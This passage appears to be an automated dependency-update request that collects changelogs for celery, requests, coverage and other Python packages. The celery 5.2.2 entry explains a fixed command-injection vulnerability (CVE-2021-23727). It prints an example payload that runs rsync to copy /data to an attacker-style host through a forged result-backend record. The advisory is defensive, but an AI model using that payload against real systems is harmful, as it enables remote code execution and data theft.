- Add pexpireat to allow setting 'expire at' with millisecond precision. (`564 <https://github.com/jazzband/django-redis/issues/564>`_)


Bug Fixes
---------

- Make expire, pexpire, expireat and persist return the redis client value (`564 <https://github.com/jazzband/django-redis/issues/564>`_)


Miscellaneous
-------------

- Convert most unittest class tests to pytest tests. (`553 <https://github.com/jazzband/django-redis/issues/553>`_)
- Update type comments to type annotations. (`568 <https://github.com/jazzband/django-redis/issues/568>`_)
- Pin redis-py to 3.x until 4.x breaking changes can be addressed. (`570 <https://github.com/jazzband/django-redis/issues/570>`_)


Documentation
-------------

- Clarify redis primary name in sentinel documentation. (`529 <https://github.com/jazzband/django-redis/issues/529>`_)
- Add documentation on configuring self signed SSL certificates. (`559 <https://github.com/jazzband/django-redis/issues/559>`_)

5.0.0

===============================

- supporting django 3.1 and django 3.2
- dropped support for python 3.5
- added support for python 3.9
- started type hinting the codebase
- ensure connections are closed
- fixed ``ShardClient`` ``.clear()`` method
- ``.delete()`` now returns boolean from django 3.1 onwards
- disconnect connection pools on ``.close()``
- added support for redis sentinel
- added ``.expire_at()`` method
- fixed ``.incr()`` when ttl is ``None`` or when the number is larger than 64 bit
- fixed ``.incr_version()`` when ttl is ``None``
- added ``.pttl()`` method to the clients to support milli-second precision for
ttl of a key
- added ``.pexpire()`` method to the clients to support milli-second precision
for setting expiry of a key

Links

• PyPI: https://pypi.org/project/django-redis
• Changelog: https://pyup.io/changelogs/django-redis/
• Repo: https://github.com/jazzband/django-redis

Update celery from 5.1.0 to 5.2.3.

Changelog

5.2.3

=====

:release-date: 2021-12-29 12:00 P.M UTC+6:00
:release-by: Asif Saif Uddin

- Allow redis >= 4.0.2.
- Upgrade minimum required pymongo version to 3.11.1.
- tested pypy3.8 beta (6998).
- Split Signature.__or__ into subclasses' __or__ (7135).
- Prevent duplication in event loop on Consumer restart.
- Restrict setuptools>=59.1.1,<59.7.0.
- Kombu bumped to v5.2.3
- py-amqp bumped to v5.0.9
- Some docs & CI improvements.


.. _version-5.2.2:

5.2.2

=====

:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz

- Various documentation fixes.
- Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

 When a task fails, the failure information is serialized in the backend.
 In some cases, the exception class is only importable from the
 consumer's code base. In this case, we reconstruct the exception class
 so that we can re-raise the error on the process which queried the
 task's result. This was introduced in 4836.
 If the recreated exception type isn't an exception, this is a security issue.
 Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
 ``os.system("rsync /data attacker192.168.56.100:~/data")``
 by setting the task's result to a failure in the result backend with the os,
 the system function as the exception type and the payload ``rsync /data attacker192.168.56.100:~/data`` as the exception arguments like so:

 .. code-block:: python

     {
           "exc_module": "os",
           'exc_type': "system",
           "exc_message": "rsync /data attacker192.168.56.100:~/data"
     }

 According to my analysis, this vulnerability can only be exploited if
 the producer delayed a task which runs long enough for the
 attacker to change the result mid-flight, and the producer has
 polled for the task's result.
 The attacker would also have to gain access to the result backend.
 The severity of this security vulnerability is low, but we still
 recommend upgrading.


.. _version-5.2.1:

5.2.1

=====

:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin

- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent (7052)
- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
- Remove dependency to case (7077).
- fix: task expiration is timezone aware if needed (7065).
- Initial testing of pypy-3.8 beta to CI.
- Docs, CI & tests cleanups.


.. _version-5.2.0:

5.2.0

=====

:release-date: 2021-11-08 7.15 A.M UTC+6:00
:release-by: Asif Saif Uddin

- Prevent from subscribing to empty channels (7040)
- fix register_task method.
- Fire task failure signal on final reject (6980)
- Limit pymongo version: <3.12.1 (7041)
- Bump min kombu version to 5.2.1

.. _version-5.2.0rc2:

5.2.0rc2

========

:release-date: 2021-11-02 1.54 P.M UTC+3:00
:release-by: Naomi Elstein

- Bump Python 3.10.0 to rc2.
- [pre-commit.ci] pre-commit autoupdate (6972).
- autopep8.
- Prevent worker to send expired revoked items upon hello command (6975).
- docs: clarify the 'keeping results' section (6979).
- Update deprecated task module removal in 5.0 documentation (6981).
- [pre-commit.ci] pre-commit autoupdate.
- try python 3.10 GA.
- mention python 3.10 on readme.
- Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
- Azure blockblob backend parametrized connection/read timeouts (6978).
- Add as_uri method to azure block blob backend.
- Add possibility to override backend implementation with celeryconfig (6879).
- [pre-commit.ci] pre-commit autoupdate.
- try to fix deprecation warning.
- [pre-commit.ci] pre-commit autoupdate.
- not needed anyore.
- not needed anyore.
- not used anymore.
- add github discussions forum

.. _version-5.2.0rc1:

5.2.0rc1

========
:release-date: 2021-09-26 4.04 P.M UTC+3:00
:release-by: Omer Katz

- Kill all workers when main process exits in prefork model (6942).
- test kombu 5.2.0rc1 (6947).
- try moto 2.2.x (6948).
- Prepared Hacker News Post on Release Action.
- update setup with python 3.7 as minimum.
- update kombu on setupcfg.
- Added note about automatic killing all child processes of worker after its termination.
- [pre-commit.ci] pre-commit autoupdate.
- Move importskip before greenlet import (6956).
- amqp: send expiration field to broker if requested by user (6957).
- Single line drift warning.
- canvas: fix kwargs argument to prevent recursion (6810) (6959).
- Allow to enable Events with app.conf mechanism.
- Warn when expiration date is in the past.
- Add the Framework :: Celery trove classifier.
- Give indication whether the task is replacing another (6916).
- Make setup.py executable.
- Bump version: 5.2.0b3 → 5.2.0rc1.

.. _version-5.2.0b3:

5.2.0b3

=======

:release-date: 2021-09-02 8.38 P.M UTC+3:00
:release-by: Omer Katz

- Add args to LOG_RECEIVED (fixes 6885) (6898).
- Terminate job implementation for eventlet concurrency backend (6917).
- Add cleanup implementation to filesystem backend (6919).
- [pre-commit.ci] pre-commit autoupdate (69).
- Add before_start hook (fixes 4110) (6923).
- Restart consumer if connection drops (6930).
- Remove outdated optimization documentation (6933).
- added https verification check functionality in arangodb backend (6800).
- Drop Python 3.6 support.
- update supported python versions on readme.
- [pre-commit.ci] pre-commit autoupdate (6935).
- Remove appveyor configuration since we migrated to GA.
- pyugrade is now set to upgrade code to 3.7.
- Drop exclude statement since we no longer test with pypy-3.6.
- 3.10 is not GA so it's not supported yet.
- Celery 5.1 or earlier support Python 3.6.
- Fix linting error.
- fix: Pass a Context when chaining fail results (6899).
- Bump version: 5.2.0b2 → 5.2.0b3.

.. _version-5.2.0b2:

5.2.0b2

=======

:release-date: 2021-08-17 5.35 P.M UTC+3:00
:release-by: Omer Katz

- Test windows on py3.10rc1 and pypy3.7 (6868).
- Route chord_unlock task to the same queue as chord body (6896).
- Add message properties to app.tasks.Context (6818).
- handle already converted LogLevel and JSON (6915).
- 5.2 is codenamed dawn-chorus.
- Bump version: 5.2.0b1 → 5.2.0b2.

.. _version-5.2.0b1:

5.2.0b1

=======

:release-date: 2021-08-11 5.42 P.M UTC+3:00
:release-by: Omer Katz

- Add Python 3.10 support (6807).
- Fix docstring for Signal.send to match code (6835).
- No blank line in log output (6838).
- Chords get body_type independently to handle cases where body.type does not exist (6847).
- Fix 6844 by allowing safe queries via app.inspect().active() (6849).
- Fix multithreaded backend usage (6851).
- Fix Open Collective donate button (6848).
- Fix setting worker concurrency option after signal (6853).
- Make ResultSet.on_ready promise hold a weakref to self (6784).
- Update configuration.rst.
- Discard jobs on flush if synack isn't enabled (6863).
- Bump click version to 8.0 (6861).
- Amend IRC network link to Libera (6837).
- Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (6872).
- Fix inspect --json output to return valid json without --quiet.
- Remove celery.task references in modules, docs (6869).
-  The Consul backend must correctly associate requests and responses (6823).

Links

• PyPI: https://pypi.org/project/celery
• Changelog: https://pyup.io/changelogs/celery/
• Homepage: http://celeryproject.org
• Docs: https://pythonhosted.org/celery/

Update boto3 from 1.17.84 to 1.20.49.

The bot wasn't able to find a changelog for this release. Got an idea?

Links

• PyPI: https://pypi.org/project/boto3
• Repo: https://github.com/boto/boto3

Update XlsxWriter from 1.4.3 to 3.0.2.

Changelog

3.0.2

-------------------------------

* Added :func:`set_top_left_cell` worksheet method to position the first
visible cell in a worksheet.

:feature:`837`.

3.0.1

------------------------------

* Add python_requires version to setup.py to help pip find the correct
matching version for Python 2 and 3.

3.0.0

------------------------------

* This is the first Python 3 only version of XlsxWriter. It is approximately
10-15% faster than the Python2/3 version.

Python 2 users should use XlsxWriter version 2.0.0, see below.

2.0.0

-----------------------------

* This is the last XlsxWriter release to support Python 2. From now bug fixes
and new features will only be available for Python 3. The deprecation notice
for Python 2 support in XlsxWriter has been in place since May 2020 and the
Python community support for Python 2 ended in January 2020. Downloads of
XlsxWriter for Python 2 is currently less than 6% of all downloads of the
library, and decreasing month by month.

Python 2 users should still be able to install versions of XlsxWriter up to
this release but not any releases afterwards.

:feature:`720`.

1.4.5

----------------------------

* Added Description/Alt Text and Decorative accessibility options for charts,
textboxes and buttons. These options were already available for images.

1.4.4

---------------------------

* Added some performance improvements. Performance for larger files should be
5-10% better.

Links

• PyPI: https://pypi.org/project/xlsxwriter
• Changelog: https://pyup.io/changelogs/xlsxwriter/
• Repo: https://github.com/jmcnamara/XlsxWriter

Update pyxero from 0.9.2 to 0.9.3.

Changelog

0.9.3

------------------

 291 - Correct representation of boolean fields
 294 - Correct saving of updated Invoices
 300 - Add filtering by ID
 302 - Correct handling of XML body format.
 303 - Removed support for Private Apps
 304 - Add support for the Payment Services API
 309 - Allow an (optional) authorization event ID when retrieving tenants
 310 - Add Python 3.9 support
 314 - Added support for HTTP429 rate limit handling

Links

• PyPI: https://pypi.org/project/pyxero
• Changelog: https://pyup.io/changelogs/pyxero/
• Repo: http://github.com/freakboy3742/pyxero

Update requests_oauthlib from 1.3.0 to 1.3.1.

Changelog

1.3.1

++++++++++++++++++++++++

- Add initial support for OAuth Mutual TLS (draft-ietf-oauth-mtls)
- Add eBay compliance fix
- Add Spotify OAuth 2 Tutorial
- Add support for python 3.8, 3.9
- Fixed LinkedIn Compliance Fixes
- Fixed ReadTheDocs Documentation and sphinx errors
- Moved pipeline to GitHub Actions

Links

• PyPI: https://pypi.org/project/requests-oauthlib
• Changelog: https://pyup.io/changelogs/requests-oauthlib/
• Repo: https://github.com/requests/requests-oauthlib

Update pyyaml from 5.4.1 to 6.0.

The bot wasn't able to find a changelog for this release. Got an idea?

Links

• PyPI: https://pypi.org/project/pyyaml
• Homepage: https://pyyaml.org/

Update pandas from 1.2.4 to 1.4.0.

The bot wasn't able to find a changelog for this release. Got an idea?

Links

• PyPI: https://pypi.org/project/pandas
• Homepage: https://pandas.pydata.org

Update numpy from 1.20.3 to 1.22.2.

The bot wasn't able to find a changelog for this release. Got an idea?

Links

• PyPI: https://pypi.org/project/numpy
• Homepage: https://www.numpy.org

Update django-tables2 from 2.4.0 to 2.4.1.

Changelog

2.4.1

- Add Persian (Farsi) locale ([806](https://github.com/jieter/django-tables2/pull/806)) by [Alirezaja1384](https://github.com/jieter/django-tables2/commits?author=Alirezaja1384)
- Improved error message if openpyxl is not installed ([816](https://github.com/jieter/django-tables2/pull/816))
- Use correct mime type for xlsx (fixes: [810](https://github.com/jieter/django-tables2/issues/810))
- Add support for django 4.0, drop support for python 3.5 ([822](https://github.com/jieter/django-tables2/issues/822))

Links

• PyPI: https://pypi.org/project/django-tables2
• Changelog: https://pyup.io/changelogs/django-tables2/
• Repo: https://github.com/jieter/django-tables2/

Update requests from 2.25.1 to 2.27.1.

Changelog

2.27.1

-------------------

**Bugfixes**

- Fixed parsing issue that resulted in the `auth` component being
dropped from proxy URLs. (6028)

2.27.0

-------------------

**Improvements**

- Officially added support for Python 3.10. (5928)

- Added a `requests.exceptions.JSONDecodeError` to unify JSON exceptions between
Python 2 and 3. This gets raised in the `response.json()` method, and is
backwards compatible as it inherits from previously thrown exceptions.
Can be caught from `requests.exceptions.RequestException` as well. (5856)

- Improved error text for misnamed `InvalidSchema` and `MissingSchema`
exceptions. This is a temporary fix until exceptions can be renamed
(Schema->Scheme). (6017)

- Improved proxy parsing for proxy URLs missing a scheme. This will address
recent changes to `urlparse` in Python 3.9+. (5917)

**Bugfixes**

- Fixed defect in `extract_zipped_paths` which could result in an infinite loop
for some paths. (5851)

- Fixed handling for `AttributeError` when calculating length of files obtained
by `Tarfile.extractfile()`. (5239)

- Fixed urllib3 exception leak, wrapping `urllib3.exceptions.InvalidHeader` with
`requests.exceptions.InvalidHeader`. (5914)

- Fixed bug where two Host headers were sent for chunked requests. (5391)

- Fixed regression in Requests 2.26.0 where `Proxy-Authorization` was
incorrectly stripped from all requests sent with `Session.send`. (5924)

- Fixed performance regression in 2.26.0 for hosts with a large number of
proxies available in the environment. (5924)

- Fixed idna exception leak, wrapping `UnicodeError` with
`requests.exceptions.InvalidURL` for URLs with a leading dot (.) in the
domain. (5414)

**Deprecations**

- Requests support for Python 2.7 and 3.6 will be ending in 2022. While we
don't have exact dates, Requests 2.27.x is likely to be the last release
series providing support.

2.26.0

-------------------

**Improvements**

- Requests now supports Brotli compression, if either the `brotli` or
`brotlicffi` package is installed. (5783)

- `Session.send` now correctly resolves proxy configurations from both
the Session and Request. Behavior now matches `Session.request`. (5681)

**Bugfixes**

- Fixed a race condition in zip extraction when using Requests in parallel
from zip archive. (5707)

**Dependencies**

- Instead of `chardet`, use the MIT-licensed `charset_normalizer` for Python3
to remove license ambiguity for projects bundling requests. If `chardet`
is already installed on your machine it will be used instead of `charset_normalizer`
to keep backwards compatibility. (5797)

You can also install `chardet` while installing requests by
specifying `[use_chardet_on_py3]` extra as follows:

 shell
 pip install "requests[use_chardet_on_py3]"
 

Python2 still depends upon the `chardet` module.

- Requests now supports `idna` 3.x on Python 3. `idna` 2.x will continue to
be used on Python 2 installations. (5711)

**Deprecations**

- The `requests[security]` extra has been converted to a no-op install.
PyOpenSSL is no longer the recommended secure option for Requests. (5867)

- Requests has officially dropped support for Python 3.5. (5867)

Links

• PyPI: https://pypi.org/project/requests
• Changelog: https://pyup.io/changelogs/requests/
• Docs: https://requests.readthedocs.io

Update tablib from 3.0.0 to 3.2.0.

Changelog

3.2.0

Changes

- Dropped Python 3.6 support (513).

Bugfixes

- Corrected order of arguments to a regex call in `safe_xlsx_sheet_title` (510).

3.1.0

Improvements

- Add support for Python 3.10 (504).
- The csv, xls, and xlsx formats gained support for the `skip_lines` keyword
argument for their `import_set()` method to be able to skip the nth first
lines of a read file (497).

Bugfixes

- Avoided mutable parameter defaults (494).
- Specify build backend for editable installs (501).
- Doubled sample size passed to `csv.Sniffer()` in `_csv.detect()` (503).

Links

• PyPI: https://pypi.org/project/tablib
• Changelog: https://pyup.io/changelogs/tablib/
• Docs: https://tablib.readthedocs.io

Update pygal from 2.4.0 to 3.0.0.

The bot wasn't able to find a changelog for this release. Got an idea?

Links

• PyPI: https://pypi.org/project/pygal
• Homepage: https://www.pygal.org/

Update coverage from 5.5 to 6.3.1.

Changelog

6.3.1

--------------------------

- Fix: deadlocks could occur when terminating processes.  Some of these
deadlocks (described in `issue 1310`_) are now fixed.

- Fix: a signal handler was being set from multiple threads, causing an error:
"ValueError: signal only works in main thread".  This is now fixed, closing
`issue 1312`_.

- Fix: ``--precision`` on the command-line was being ignored while considering
``--fail-under``.  This is now fixed, thanks to
`Marcelo Trylesinski <pull 1317_>`_.

- Fix: releases no longer provide 3.11.0-alpha wheels. Coverage.py uses CPython
internal fields which are moving during the alpha phase. Fixes `issue 1316`_.

.. _issue 1310: https://github.com/nedbat/coveragepy/issues/1310
.. _issue 1312: https://github.com/nedbat/coveragepy/issues/1312
.. _issue 1316: https://github.com/nedbat/coveragepy/issues/1316
.. _pull 1317: https://github.com/nedbat/coveragepy/pull/1317


.. _changes_63:

6.3

------------------------

- Feature: Added the ``lcov`` command to generate reports in LCOV format.
Thanks, `Bradley Burns <pull 1289_>`_. Closes issues `587 <issue 587_>`_
and `626 <issue 626_>`_.

- Feature: the coverage data file can now be specified on the command line with
the ``--data-file`` option in any command that reads or writes data.  This is
in addition to the existing ``COVERAGE_FILE`` environment variable.  Closes
`issue 624`_. Thanks, `Nikita Bloshchanevich <pull 1304_>`_.

- Feature: coverage measurement data will now be written when a SIGTERM signal
is received by the process.  This includes
:meth:`Process.terminate <python:multiprocessing.Process.terminate>`,
and other ways to terminate a process.  Currently this is only on Linux and
Mac; Windows is not supported.  Fixes `issue 1307`_.

- Dropped support for Python 3.6, which reached end-of-life on 2021-12-23.

- Updated Python 3.11 support to 3.11.0a4, fixing `issue 1294`_.

- Fix: the coverage data file is now created in a more robust way, to avoid
problems when multiple processes are trying to write data at once. Fixes
issues `1303 <issue 1303_>`_ and `883 <issue 883_>`_.

- Fix: a .gitignore file will only be written into the HTML report output
directory if the directory is empty.  This should prevent certain unfortunate
accidents of writing the file where it is not wanted.

- Releases now have MacOS arm64 wheels for Apple Silicon, fixing `issue 1288`_.

.. _issue 587: https://github.com/nedbat/coveragepy/issues/587
.. _issue 624: https://github.com/nedbat/coveragepy/issues/624
.. _issue 626: https://github.com/nedbat/coveragepy/issues/626
.. _issue 883: https://github.com/nedbat/coveragepy/issues/883
.. _issue 1288: https://github.com/nedbat/coveragepy/issues/1288
.. _issue 1294: https://github.com/nedbat/coveragepy/issues/1294
.. _issue 1303: https://github.com/nedbat/coveragepy/issues/1303
.. _issue 1307: https://github.com/nedbat/coveragepy/issues/1307
.. _pull 1289: https://github.com/nedbat/coveragepy/pull/1289
.. _pull 1304: https://github.com/nedbat/coveragepy/pull/1304


.. _changes_62:

6.2

------------------------

- Feature: Now the ``--concurrency`` setting can now have a list of values, so
that threads and another lightweight threading package can be measured
together, such as ``--concurrency=gevent,thread``.  Closes `issue 1012`_ and
`issue 1082`_.

- Fix: A module specified as the ``source`` setting is imported during startup,
before the user program imports it.  This could cause problems if the rest of
the program isn't ready yet.  For example, `issue 1203`_ describes a Django
setting that is accessed before settings have been configured.  Now the early
import is wrapped in a try/except so errors then don't stop execution.

- Fix: A colon in a decorator expression would cause an exclusion to end too
early, preventing the exclusion of the decorated function. This is now fixed.

- Fix: The HTML report now will not overwrite a .gitignore file that already
exists in the HTML output directory (follow-on for `issue 1244`_).

- API: The exceptions raised by Coverage.py have been specialized, to provide
finer-grained catching of exceptions by third-party code.

- API: Using ``suffix=False`` when constructing a Coverage object with
multiprocessing wouldn't suppress the data file suffix (`issue 989`_).  This
is now fixed.

- Debug: The ``coverage debug data`` command will now sniff out combinable data
files, and report on all of them.

- Debug: The ``coverage debug`` command used to accept a number of topics at a
time, and show all of them, though this was never documented.  This no longer
works, to allow for command-line options in the future.

.. _issue 989: https://github.com/nedbat/coveragepy/issues/989
.. _issue 1012: https://github.com/nedbat/coveragepy/issues/1012
.. _issue 1082: https://github.com/nedbat/coveragepy/issues/1082
.. _issue 1203: https://github.com/nedbat/coveragepy/issues/1203


.. _changes_612:

6.1.2

--------------------------

- Python 3.11 is supported (tested with 3.11.0a2).  One still-open issue has to
do with `exits through with-statements <issue 1270_>`_.

- Fix: When remapping file paths through the ``[paths]`` setting while
combining, the ``[run] relative_files`` setting was ignored, resulting in
absolute paths for remapped file names (`issue 1147`_).  This is now fixed.

- Fix: Complex conditionals over excluded lines could have incorrectly reported
a missing branch (`issue 1271`_). This is now fixed.

- Fix: More exceptions are now handled when trying to parse source files for
reporting.  Problems that used to terminate coverage.py can now be handled
with ``[report] ignore_errors``.  This helps with plugins failing to read
files (`django_coverage_plugin issue 78`_).

- Fix: Removed another vestige of jQuery from the source tarball
(`issue 840`_).

- Fix: Added a default value for a new-to-6.x argument of an internal class.
This unsupported class is being used by coveralls (`issue 1273`_). Although
I'd rather not "fix" unsupported interfaces, it's actually nicer with a
default value.

.. _django_coverage_plugin issue 78: https://github.com/nedbat/django_coverage_plugin/issues/78
.. _issue 1147: https://github.com/nedbat/coveragepy/issues/1147
.. _issue 1270: https://github.com/nedbat/coveragepy/issues/1270
.. _issue 1271: https://github.com/nedbat/coveragepy/issues/1271
.. _issue 1273: https://github.com/nedbat/coveragepy/issues/1273


.. _changes_611:

6.1.1

--------------------------

- Fix: The sticky header on the HTML report didn't work unless you had branch
coverage enabled. This is now fixed: the sticky header works for everyone.
(Do people still use coverage without branch measurement!? j/k)

- Fix: When using explicitly declared namespace packages, the "already imported
a file that will be measured" warning would be issued (`issue 888`_